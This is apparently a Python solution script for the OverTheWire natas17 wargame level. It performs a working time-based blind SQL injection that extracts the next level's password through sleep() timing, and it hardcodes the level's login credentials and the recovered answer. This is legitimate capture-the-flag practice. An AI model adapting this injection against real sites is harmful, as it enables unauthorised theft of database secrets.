# coding=utf-8
import base64
import requests
# HTTP Basic credentials for the current level, kept as bytes so they can be
# concatenated straight into base64.b64encode() without an intermediate str.
USERNAME = b'natas17:'
PASSWORD = b'8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw'
URL = 'http://natas17.natas.labs.overthewire.org'
# Candidate alphabet for the search: digits, then lowercase, then uppercase.
CHARS = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
# Known prefix to start from; empty means nothing has been recovered yet.
NEXT_LEVEL_PASSWORD = ''
# Output:\n<pre>\n</pre>
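def connect():
    """Authenticate to the level page and publish the auth header.

    Builds the HTTP Basic ``Authorization`` header from USERNAME/PASSWORD,
    stores it in the module-level ``headers`` dict that select_chars() and
    brute_force() read, and sends one GET to URL to confirm the credentials
    are accepted before any further requests are made.

    Raises:
        RuntimeError: if the probe request is not answered with HTTP 200
            (for example 401 when the credentials are rejected).
    """
    global headers
    base_encoded_auth = base64.b64encode(USERNAME + PASSWORD).decode('utf-8')
    # Not printed on purpose: the encoded value is the credential pair in a
    # reversible encoding and would otherwise end up in scrollback and logs.
    headers = {'Authorization': 'Basic {0}'.format(base_encoded_auth)}
    response = requests.get(URL, headers=headers, timeout=10)
    # The original ``assert (cond, msg)`` asserted a non-empty tuple, which is
    # always true, so a failed login was never detected; check explicitly.
    if response.status_code != requests.codes.ok:
        raise RuntimeError("Can't connect: HTTP {0}".format(response.status_code))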
def select_chars():
    """Return the subset of CHARS that occurs anywhere in the natas18 password.

    One request per candidate character is sent whose injected condition
    makes the server ``sleep(5)`` when ``password LIKE BINARY "%<char>%"``
    holds; the request uses ``timeout=1``, so a raised Timeout is taken as
    "character present". Reads the module-level ``headers`` set by
    connect(). Prints the alphabet found, then returns it as a str.
    """
    parsed_chars = ''
    for char in CHARS:
        try:
            response = requests.get(
                URL + '?username=natas18" AND IF(password LIKE BINARY "%' + char + '%",sleep(5), null) %23', timeout=1,
                headers=headers)
            # print(response.text)
        except requests.exceptions.Timeout:
            # NOTE(review): any reply slower than 1 s (latency, server load)
            # is classified the same way as a real sleep(5), so this is a
            # timing inference rather than a confirmed match.
            parsed_chars += char
    print('Characters Used: ' + parsed_chars)
    print('Starting brute force...')
    return parsed_chars
def brute_force(selected_chars, next_level_password):
    """Extend the known prefix one character at a time, left to right.

    Args:
        selected_chars: alphabet to try at each position (normally the
            output of select_chars()).
        next_level_password: prefix already known; pass '' to start from
            the first character.

    For each of the 32 positions every candidate is appended to the prefix
    and tested with ``password LIKE BINARY "<prefix><char>%"``; a request
    that times out (server-side ``sleep(5)`` against ``timeout=1``) is taken
    as a match and the search moves to the next position. Progress is
    printed; nothing is returned, so the printed output is the only place
    the recovered value appears. Reads the module-level ``headers`` set by
    connect().
    """
    # Assuming password is 32 characters long
    for i in range(32):
        for char in selected_chars:
            # SQL injection #2
            try:
                req = requests.get(
                    URL + '?username=natas18" AND IF(password LIKE BINARY "' + next_level_password + char + '%", sleep(5), null) %23',
                    timeout=1,
                    headers=headers) # timeout waits a second before assuming sleep has been triggered
            except requests.exceptions.Timeout:
                next_level_password += char
                print('Password: ' + next_level_password + '*' * int(32 - len(next_level_password)))
                # Only the matching candidate extends the prefix; if no
                # candidate times out at this position the outer loop still
                # advances, so a missed character is not detected here.
                break
# Driver. Order matters: connect() must run first because select_chars() and
# brute_force() both read the module-level ``headers`` it sets.
connect()
selected_chars = select_chars()
brute_force(selected_chars, NEXT_LEVEL_PASSWORD)
print('Done') # xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP